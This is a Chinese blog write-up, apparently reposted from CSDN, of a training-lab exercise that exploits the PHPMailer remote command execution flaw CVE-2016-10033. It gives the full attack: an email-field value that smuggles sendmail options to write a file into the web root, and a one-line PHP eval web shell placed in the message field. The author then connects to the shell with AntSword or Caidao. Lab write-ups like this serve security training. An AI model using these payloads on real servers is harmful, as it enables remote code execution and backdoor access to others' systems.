当前位置:网站首页>墨者学院-PHPMailer远程命令执行漏洞溯源

墨者学院-PHPMailer远程命令执行漏洞溯源

2022-07-04 07:40:00 Lyswbb

拿到靶场之后点击访问

工具

分享一个小工具,用来爬取相关的url       Link Gopher

可以看到有用的就一个mail.php

 进入之后来到一个邮件测试页面,很明显这里是一个功能点

 phpmailer介绍

PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务。相关漏洞CVE编号(CVE-2016-10033)

burp抓包,更改email处payload为

"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/1.php @aaa.com

更改message处payload为

<?php @eval($_POST[cmd]);?>

 

 然后访问http://124.70.71.251:44768/1.php,使用蚁剑或者菜刀连接即可

 

 

原网站

版权声明
本文为[Lyswbb]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_47094508/article/details/125559517

边栏推荐

猜你喜欢

随机推荐